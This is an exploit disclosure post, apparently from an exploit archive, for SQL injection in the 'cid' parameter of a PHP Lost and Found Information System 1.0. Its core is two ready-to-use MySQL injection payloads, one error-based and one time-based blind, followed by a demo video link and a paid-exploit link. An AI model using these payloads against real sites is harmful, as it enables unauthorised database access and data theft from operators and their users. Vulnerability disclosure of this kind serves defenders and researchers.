📄 Lost and Found Information System 1.0 SQL Injection

# Titles: Lost and Found Information System-1.0 SQLi
    # Author: nu11secur1ty
    # Date: 08/05/2025
    # Vendor: https://github.com/oretnom23
    # Software:
    https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
    # Reference: https://portswigger.net/web-security/sql-injection
    
    ## Description:
    The cid parameter appears to be vulnerable to SQL injection attacks. A
    single quote was submitted in the cid parameter, and a database error
    message was returned. Two single quotes were then submitted and the error
    message disappeared. You should review the contents of the error message,
    and the application's handling of other input, to confirm whether a
    vulnerability is present.
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    - SQLi:
    
    ```SQLi
    ---
    Parameter: cid (GET)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: page=items&cid=1' AND (SELECT 5436 FROM(SELECT
    COUNT(*),CONCAT(0x7176787671,(SELECT
    (ELT(5436=5436,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# crEm
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=items&cid=1' AND (SELECT 4729 FROM
    (SELECT(SLEEP(7)))Bkuo)# Cdpc
    ---
    ```
    
    # Reproduce:
    [href](https://www.youtube.com/watch?v=Py2fywLsjYc)
    
    # Buy an exploit only:
    [href](https://www.patreon.com/posts/lost-and-found-1-135775268)
    
    # Time spent:
    01:15:00